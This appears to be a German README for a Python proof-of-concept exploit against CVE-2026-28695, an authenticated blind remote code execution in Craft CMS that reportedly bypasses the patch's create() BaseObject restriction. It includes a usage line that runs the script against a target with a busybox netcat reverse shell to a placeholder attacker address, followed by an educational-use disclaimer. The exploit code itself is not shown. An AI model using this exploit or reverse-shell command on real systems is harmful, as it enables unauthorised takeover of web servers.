
Python-PoC-Exploit für CVE-2026-28695, eine authentifizierte blinde RCE in Craft CMS, die den create()-BaseObject-Patch umgeht und eine Reverse Shell startet.
Authentifizierte blinde Remote-Code-Ausführung in Craft CMS. Umgeht die create() - BaseObject-Einschränkung, die im CVE-2026-28695-Fix (Commit e31e508) hinzugefügt wurde.
python3 exp.py -t http://target.htb -u user -p 'password' -c 'busybox nc ATTACKER_IP ATTACKER_PORT -e /bin/sh'
Dieses Skript ist ausschließlich für Bildungszwecke gedacht. Der Autor ist nicht verantwortlich für jeglichen Missbrauch oder Schaden, der durch diesen Exploit verursacht wird. Stellen Sie stets sicher, dass Sie eine Genehmigung haben, bevor Sie Schwachstellen testen oder ausnutzen!